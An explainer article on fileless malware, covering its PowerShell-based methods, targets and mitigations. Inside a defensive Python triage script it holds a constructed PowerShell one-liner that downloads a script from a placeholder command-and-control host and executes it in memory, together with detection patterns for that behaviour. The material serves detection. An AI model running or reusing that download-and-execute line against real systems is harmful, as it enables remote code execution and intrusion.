Typical malware detection software works on signature detection: it looks for identifiable pieces of code that are unique to a particular type of infection. Other malware, such as ransomware, does not always leave such a trace; however, heuristic scanning can detect and halt the behaviors specific to ransomware, allowing users to take action to protect their data.
But how do you protect against an infection that has no signature to clearly identify it, and that does not perform a behavior that is out of the norm, such as encrypting hundreds of files per second? Furthermore, what can be done when the very commands and applications the infection invokes are native to the operating system and are used to perform legitimate management tasks?
These are the characteristics of fileless malware: a type of malware that does not rely on virus-laden files to infect a host, but instead attacks a system from the inside, executing malicious code in resident memory. Its attack methods use stealth to mask the commands it employs, both to keep its access hidden and to conceal the network traffic between infected hosts and remote command & control (C&C) servers, leaving a backdoor open for future malware attacks.
This smart person's guide details what you need to know about fileless malware and the ways in which it operates, so that you may best protect against it.
- What is fileless malware? Fileless malware is a type of malware infection that uses a system's own trusted system files and services to obtain access to devices while evading detection. It may be paired with other malware types to deliver multiple payloads.
- Why does fileless malware matter? As malware continues to grow and evolve, the threats are becoming more sophisticated, and it is increasingly difficult to detect these threats, let alone stop them.
- Who does fileless malware affect? Fileless malware is targeting corporate networks, particularly financial institutions. However, because threat actors are pairing it with other forms of malware to deliver additional payloads, it is expected to grow into something that affects all computer users, personal and business alike.
- When is fileless malware happening? Fileless malware, or memory-based malicious code that exists in RAM, has been around for quite some time. However, given the tools now used to manage systems, this invisible malware has seen a sharp increase in use in the past couple of years.
- How do I avoid infection by fileless malware? Fileless malware infections are extremely hard to detect without forensic software to confirm the compromise. Businesses can implement strategies to minimize the exposure to infection, or at the very least, mitigate the spread of the infection to other devices on shared networks.
What is fileless malware?
Fileless malware uses a system's built-in services, management commands, and applications to infect the host. By using the system's existing applications, a threat actor can escalate privileges and use the same tools that manage the system (e.g., PowerShell) to run scripts directly from memory, so the activity appears as a normal running process and is virtually undetectable.
Attackers typically use these system commands to create hidden shares where they store scripts that have been used to compromise systems, such as creating network proxy connections; those connections are used to communicate with remote command & control (C&C) servers that are maintained by threat actors for additional payload delivery.
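Detection is where defenders get traction against this pattern. As an added example (not from the original article), the Python below runs a small triage pass over constructed process-creation records: it decodes PowerShell's -EncodedCommand argument and scores both the visible and the decoded command line for signs of script content run straight from memory. The record shape, the indicator weights and the placeholder host name are assumptions.

```python
import base64
import binascii
import re
# Constructed for this example: a one-liner that pulls a script straight into
# memory; the host name is a placeholder, not a real indicator.
CONSTRUCTED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage.ps1')"
ENCODED = base64.b64encode(CONSTRUCTED_SCRIPT.encode("utf-16-le")).decode("ascii")
# Constructed process-creation records in "Image|CommandLine" form (the shape of
# Sysmon Event ID 1 / Windows 4688 data); sample lines, not real telemetry.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile -Command Get-Service",
    r"C:\Windows\System32\cmd.exe|cmd.exe /c dir C:\Users",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc " + ENCODED,
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
]

# PowerShell accepts abbreviated switches, so match -e, -ec, -en, -enc and -EncodedCommand.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
# Weighted signs of script content run from memory; weights are assumptions for this example.
INDICATORS = [
    (re.compile(r"(?i)\bIEX\b|Invoke-Expression"), "runs a string as code", 3),
    (re.compile(r"(?i)\.Download(?:String|Data)\("), "fetches code over the network into memory", 3),
    (re.compile(r"(?i)\s-w(?:indowstyle)?\s+hidden"), "hidden window", 1),
    (re.compile(r"(?i)\s-e(?:p|xecutionpolicy)\s+bypass"), "execution policy bypass", 1),
]

def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext behind an -EncodedCommand argument, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # not a valid encoded command; score the visible text only

def analyze(event):
    """Score one record; indicators are checked on the visible and the decoded command line."""
    image, _, cmdline = event.partition("|")
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [(label, weight) for rx, label, weight in INDICATORS if rx.search(text)]
    if decoded is not None:
        hits.append(("encoded command line", 2))
    return {"image": image, "score": sum(w for _, w in hits),
            "indicators": [label for label, _ in hits], "decoded": decoded}

def triage(events, threshold=3):
    return [r for r in map(analyze, events) if r["score"] >= threshold]
```

Only the record that hides its script behind an encoded command line crosses the threshold; the legitimate -ExecutionPolicy Bypass backup job scores 1 and is left alone, which is the kind of baseline tuning a real deployment needs.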
Why does fileless malware matter?
Let's face it, malware is not going away anytime soon. And with the prevalence of threat actors using their technical capabilities to attack business and personal networks, any advancements that allow them to exfiltrate data, encrypt user data in exchange for a ransom, or otherwise prevent access to services means it will take more effort and resources to secure devices on networks.
Fileless malware is especially worrisome because the infection vector could be anything, and the indicators of compromise (IOC) vary from infection to infection depending on the attacker's goal. Infections are classified as an Advanced Volatile Threat (AVT): code that persists in the infected machine's memory or registry, or is combined with additional payloads for more targeted attacks in the future, such as enrolling the machine in a group's botnet.
Who does fileless malware affect?
Fileless malware affects everyone who uses a computer. Based on attacks reported thus far, the main targets of compromises using fileless malware have been networks in the financial sector. This is mainly due to the undetectable nature of the infection, which allows stealthy data exfiltration to occur while leaving little trace that the attack ever happened.
When is fileless malware happening?
Malicious code has existed for decades. Fileless malware is a relatively new threat, but it is ultimately built on that same concept of malicious code.
In recent years, as malware attacks have increased, so have the tactics threat actors use; fileless malware is one such tactic, and its usage has risen over the last couple of years. Because it adapts readily to being joined with other types of malware for increasingly damaging payloads, recent stealth-based attacks have paired fileless malware with ransomware to not only compromise a host, but also encrypt its data and leave a backdoor for future attacks.
How do I avoid infection by fileless malware?
Fileless malware is difficult to detect and, unfortunately, there is no surefire way to protect against it. There are, however, several things to look out for, based on a combination of known infection vectors and the types of programs typically compromised to carry out attacks.
Administrators and end users can work together to minimize the potential for infection, as well as mitigate exposure on affected systems. Follow this security plan:
- Keep patches up-to-date;
- Disable unnecessary services and program features;
- Uninstall nonessential applications;
- Install endpoint security;
- Restrict admin privileges;
- Monitor network traffic; and
- Provide security training to end users.
Jesus Vigo is a Network Administrator by day and owner of Mac|Jesus, LLC, specializing in Mac and Windows integration and providing solutions to small- and medium-size businesses. He brings 19 years of experience and multiple certifications from several vendors, including Apple and CompTIA.